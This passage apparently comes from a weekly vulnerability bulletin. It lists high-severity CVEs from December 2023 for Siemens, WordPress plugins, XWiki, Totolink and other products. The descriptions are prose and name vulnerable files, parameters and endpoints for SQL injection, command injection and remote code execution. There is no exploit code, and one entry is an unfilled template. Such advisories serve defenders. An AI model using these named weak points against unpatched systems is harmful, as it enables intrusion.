siemens — multiple_products A vulnerability has been identified in SIMATIC CP 1242-7 V2 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-7 LTE (All versions), SIMATIC CP 1243-8 IRC (All versions), SIMATIC CP 1543-1 (All versions), SINAMICS S210 (6SL5…) (All versions >= V6.1 < V6.1 HF2), SIPLUS NET CP 1543-1 (All versions). The webserver implementation of the affected products does not correctly release allocated memory after it has been used. An attacker with network access could use this vulnerability to cause a denial-of-service condition in the webserver of the affected product. 2023-12-12 7.5 CVE-2023-38380
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an out of bounds write past the end of an allocated buffer when handling specific requests on port 4002/tcp. This could allow an attacker to crash the application. The corresponding service is auto-restarted after the crash. 2023-12-12 7.5 CVE-2023-46283
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an out of bounds write past the end of an allocated buffer when handling specific requests on port 4002/tcp and 4004/tcp. This could allow an attacker to crash the application. The corresponding service is auto-restarted after the crash. 2023-12-12 7.5 CVE-2023-46284
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an improper input validation vulnerability that could allow an attacker to bring the service into a Denial-of-Service state by sending a specifically crafted message to 4004/tcp. The corresponding service is auto-restarted after the crash is detected by a watchdog. 2023-12-12 7.5 CVE-2023-46285
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V8.0), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V8.0), SCALANCE M804PB (All versions < V8.0), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V8.0), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V8.0), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V8.0), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V8.0), SCALANCE M826-2 SHDSL-Router (All versions < V8.0), SCALANCE M874-2 (All versions < V8.0), SCALANCE M874-3 (All versions < V8.0), SCALANCE M876-3 (EVDO) (All versions < V8.0), SCALANCE M876-3 (ROK) (All versions < V8.0), SCALANCE M876-4 (All versions < V8.0), SCALANCE M876-4 (EU) (All versions < V8.0), SCALANCE M876-4 (NAM) (All versions < V8.0), SCALANCE MUM853-1 (EU) (All versions < V8.0), SCALANCE MUM856-1 (EU) (All versions < V8.0), SCALANCE MUM856-1 (RoW) (All versions < V8.0), SCALANCE S615 (All versions < V8.0), SCALANCE S615 EEC (All versions < V8.0). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the handling of the DDNS configuration. This could allow malicious local administrators to issue commands on system level after a successful IP address update. 2023-12-12 7.2 CVE-2023-49691
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.2.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.2.2), SCALANCE M804PB (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.2.2), SCALANCE M874-2 (All versions < V7.2.2), SCALANCE M874-3 (All versions < V7.2.2), SCALANCE M876-3 (EVDO) (All versions < V7.2.2), SCALANCE M876-3 (ROK) (All versions < V7.2.2), SCALANCE M876-4 (All versions < V7.2.2), SCALANCE M876-4 (EU) (All versions < V7.2.2), SCALANCE M876-4 (NAM) (All versions < V7.2.2), SCALANCE MUM853-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (RoW) (All versions < V7.2.2), SCALANCE S615 (All versions < V7.2.2), SCALANCE S615 EEC (All versions < V7.2.2). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the parsing of the IPSEC configuration. This could allow malicious local administrators to issue commands on system level after a new connection is established. 2023-12-12 7.2 CVE-2023-49692
productcert@siemens.com
siemens — opcenter_quality A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). When accessing the UMC Web-UI from affected products, UMC uses an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior. 2023-12-12 8.8 CVE-2023-46281
productcert@siemens.com
siemens — simatic_drive_controller_cpu_1504d_tf Affected devices improperly handle specially crafted packets sent to port 102/tcp. This could allow an attacker to create a denial of service condition. A restart is needed to restore normal operations. 2023-12-12 7.5 CVE-2023-46156
productcert@siemens.com
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). Affected products do not properly validate the certificate of the configured UMC server. This could allow an attacker to intercept credentials that are sent to the UMC server as well as to manipulate responses, potentially allowing an attacker to escalate privileges. 2023-12-12 9.8 CVE-2023-48427
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). Affected software does not correctly validate the response received by an UMC server. An attacker can use this to crash the affected software by providing and configuring a malicious UMC server or by manipulating the traffic from a legitimate UMC server (i.e. leveraging CVE-2023-48427). 2023-12-12 8.6 CVE-2023-48431
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The radius configuration mechanism of affected products does not correctly check uploaded certificates. A malicious admin could upload a crafted certificate resulting in a denial-of-service condition or potentially issue commands on system level. 2023-12-12 7.2 CVE-2023-48428
productcert@siemens.com
silabs — gsdk An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. 2023-12-15 9 CVE-2023-4020
product-security@silabs.com
product-security@silabs.com
silverpeas — silverpeas Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in “Maintenance Mode” due to broken access control. This makes the application unavailable to all users. This affects Silverpeas Core 6.3.1 and below. 2023-12-13 8.1 CVE-2023-47320
cve@mitre.org
cve@mitre.org
silverpeas — silverpeas The “userModify” feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF with execute making the attacker an administrator user in the application. 2023-12-13 8.8 CVE-2023-47322
cve@mitre.org
cve@mitre.org
silverpeas — silverpeas The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators. 2023-12-13 7.5 CVE-2023-47323
cve@mitre.org
cve@mitre.org
smartstar_software — cws_web-base SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. 2023-12-15 9.8 CVE-2023-48376
twcert@cert.org.tw
smartstar_software — cws_web-base SmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service. 2023-12-15 8.8 CVE-2023-48375
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48378
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service. 2023-12-15 7.4 CVE-2023-48380
twcert@cert.org.tw
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as critical. Affected is an unknown function of the file attendance.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247254 is the identifier assigned to this vulnerability. 2023-12-08 9.8 CVE-2023-6617
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /modals/class_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247256. 2023-12-08 9.8 CVE-2023-6619
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability classified as critical was found in SourceCodester Simple Student Attendance System 1.0. This vulnerability affects unknown code of the file ajax-api.php?action=save_attendance. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247366 is the identifier assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6658
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247255. 2023-12-08 8.8 CVE-2023-6618
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester– simple_student_attendance_system A vulnerability classified as critical has been found in SourceCodester Simple Student Attendance System 1.0. This affects an unknown part of the file /modals/student_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-247365 was assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6657
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
squid — squid Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid’s patch archives. 2023-12-14 8.6 CVE-2023-50269
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
suse — rancher In Rancher 2.x before 2.6.13 and 2.7.x before 2.7.4, an incorrectly applied authorization check allows users who have certain access to a namespace to move that namespace to a different project. 2023-12-12 8.8 CVE-2020-10676
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
thecosy — icecms A vulnerability was found in Thecosy IceCMS 2.0.1. It has been classified as problematic. Affected is an unknown function of the file /login of the component Captcha Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247884. 2023-12-13 9.8 CVE-2023-6756
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
thecosy — icecms A vulnerability, which was classified as problematic, has been found in Thecosy IceCMS up to 2.0.1. This issue affects some unknown processing of the component User Data Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247889 was assigned to this vulnerability. 2023-12-13 8.8 CVE-2023-6761
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
thecosy — icecms A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. This affects an unknown part of the file /WebResource/resource of the component Love Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247887. 2023-12-13 7.5 CVE-2023-6759
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda2000 — tongda_oa A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file general/notify/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-247244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 7.5 CVE-2023-6608
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda2000 — tongda_oa A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. This vulnerability affects unknown code of the file pda/pad/email/delete.php. The manipulation of the argument EMAIL_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-247246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 7.5 CVE-2023-6611
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/wiki/cp/manage/delete.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247243. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 7.5 CVE-2023-6607
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink — a7000r_firmware TOTOLink A7000R V9.1.0u.6115_B20201022 has a stack overflow vulnerability via setOpModeCfg. 2023-12-11 9.8 CVE-2023-49417
cve@mitre.org
totolink — a7000r_firmware TOTOLink A7000R V9.1.0u.6115_B20201022has a stack overflow vulnerability via setIpPortFilterRules. 2023-12-11 9.8 CVE-2023-49418
cve@mitre.org
totolink — x5000r_firmware A vulnerability was found in Totolink X5000R 9.1.0cu.2300_B20230112. It has been rated as critical. This issue affects the function setDdnsCfg/setDynamicRoute/setFirewallType/setIPSecCfg/setIpPortFilterRules/setLancfg/setLoginPasswordCfg/setMacFilterRules/setMtknatCfg/setNetworkConfig/setPortForwardRules/setRemoteCfg/setSSServer/setScheduleCfg/setSmartQosCfg/setStaticDhcpRules/setStaticRoute/setVpnAccountCfg/setVpnPassCfg/setVpnUser/setWiFiAclAddConfig/setWiFiEasyGuestCfg/setWiFiGuestCfg/setWiFiRepeaterConfig/setWiFiScheduleCfg/setWizardCfg of the file /cgi-bin/cstecgi.cgi. The manipulation leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247247. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 9.8 CVE-2023-6612
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tutao — tutanota Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue. 2023-12-15 9.3 CVE-2023-46116
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
undertow — undertow A flaw was found in Undertow. When an AJP request is sent that exceeds the max-header-size attribute in ajp-listener, JBoss EAP is marked in an error state by mod_cluster in httpd, causing JBoss EAP to close the TCP connection without returning an AJP response. This happens because mod_proxy_cluster marks the JBoss EAP instance as an error worker when the TCP connection is closed from the backend after sending the AJP request without receiving an AJP response, and stops forwarding. This issue could allow a malicious user could to repeatedly send requests that exceed the max-header-size, causing a Denial of Service (DoS). 2023-12-12 7.5 CVE-2023-5379
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
vyperlang — vyper Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine (EVM). Contracts containing large arrays might underallocate the number of slots they need by 1. Prior to v0.3.8, the calculation to determine how many slots a storage variable needed used `math.ceil(type_.size_in_bytes / 32)`. The intermediate floating point step can produce a rounding error if there are enough bits set in the IEEE-754 mantissa. Roughly speaking, if `type_.size_in_bytes` is large (> 2**46), and slightly less than a power of 2, the calculation can overestimate how many slots are needed by 1. If `type_.size_in_bytes` is slightly more than a power of 2, the calculation can underestimate how many slots are needed by 1. This issue is patched in version 0.3.8. 2023-12-13 7.5 CVE-2023-46247
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
wordpress — wordpress The Digital Publications by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.6. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2023-12-09 8.8 CVE-2023-5756
security@wordfence.com
security@wordfence.com
wordpress — wordpress The EazyDocs WordPress plugin before 2.3.4 does not properly sanitize and escape “data” parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. 2023-12-11 8.8 CVE-2023-6035
contact@wpscan.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bruno “Aesqe” Babic File Gallery allows Reflected XSS.This issue affects File Gallery: from n/a through 1.8.5.4. 2023-12-14 7.1 CVE-2023-48771
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS.This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3. 2023-12-15 7.1 CVE-2023-49170
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in TheInnovs Innovs HR – Complete Human Resource Management System for Your Business allows Reflected XSS.This issue affects Innovs HR – Complete Human Resource Management System for Your Business: from n/a through 1.0.3.4. 2023-12-14 7.1 CVE-2023-49171
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BrainCert BrainCert – HTML5 Virtual Classroom allows Reflected XSS.This issue affects BrainCert – HTML5 Virtual Classroom: from n/a through 1.30. 2023-12-14 7.1 CVE-2023-49172
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS.This issue affects WP Pocket URLs: from n/a through 1.0.2. 2023-12-15 7.1 CVE-2023-49176
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gilles Dumas which template file allows Reflected XSS.This issue affects which template file: from n/a through 4.9.0. 2023-12-15 7.1 CVE-2023-49177
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS.This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0. 2023-12-15 7.1 CVE-2023-49178
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS.This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10. 2023-12-15 7.1 CVE-2023-49182
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS.This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2. 2023-12-15 7.1 CVE-2023-49183
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS.This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7. 2023-12-15 7.1 CVE-2023-49185
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spoonthemes Adifier – Classified Ads WordPress Theme allows Reflected XSS.This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. 2023-12-15 7.1 CVE-2023-49187
audit@patchstack.com
wordpress — wordpress [PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR] 2023-12-14 7.1 CVE-2023-49739
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themefic Ultimate Addons for Contact Form 7 allows Stored XSS.This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.2.0. 2023-12-14 7.1 CVE-2023-49766
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Peter Raschendorfer Smart External Link Click Monitor [Link Log] allows Reflected XSS.This issue affects Smart External Link Click Monitor [Link Log]: from n/a through 5.0.2. 2023-12-14 7.1 CVE-2023-49771
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus allows Stored XSS.This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. 2023-12-14 7.1 CVE-2023-49813
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. 2023-12-14 7.1 CVE-2023-49827
audit@patchstack.com
wordpress — wordpress The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-16 7.5 CVE-2023-6559
security@wordfence.com
security@wordfence.com
wordpress — wordpress The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘import_action’ function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 7.2 CVE-2023-6826
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘ajaxUploadFonts’ function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 7.5 CVE-2023-6827
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 		 The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. 2023-12-15 9.8 CVE-2023-6553
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 		 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aleksandar Uroševi? Stock Ticker allows Reflected XSS.This issue affects Stock Ticker: from n/a through 3.23.2. 2023-12-14 7.1 CVE-2022-45365
audit@patchstack.com
wso2 — wso2_api_manager Multiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the “Prompt for username, password and consent” option. * A service provider that uses the above IDP for federated authentication and has the “Assert identity using mapped local subject identifier” flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation. 2023-12-15 8.5 CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
xorg-server — xorg-server A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information. 2023-12-13 7.6 CVE-2023-6478
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
xorg-server — xorg-server A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved. 2023-12-13 7.8 CVE-2023-6377
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn’t properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user’s profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`. 2023-12-15 9.9 CVE-2023-50721
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn’t require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. 2023-12-15 9.6 CVE-2023-50722
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. 2023-12-15 9.9 CVE-2023-50723
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. 2023-12-15 7.5 CVE-2023-50719
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
zammad — zammad An issue was discovered in Zammad before 6.2.0. Due to lack of rate limiting in the “email address verification” feature, an attacker could send many requests for a known address to cause Denial Of Service (generation of many emails, which would also spam the victim). 2023-12-10 7.5 CVE-2023-50455
cve@mitre.org
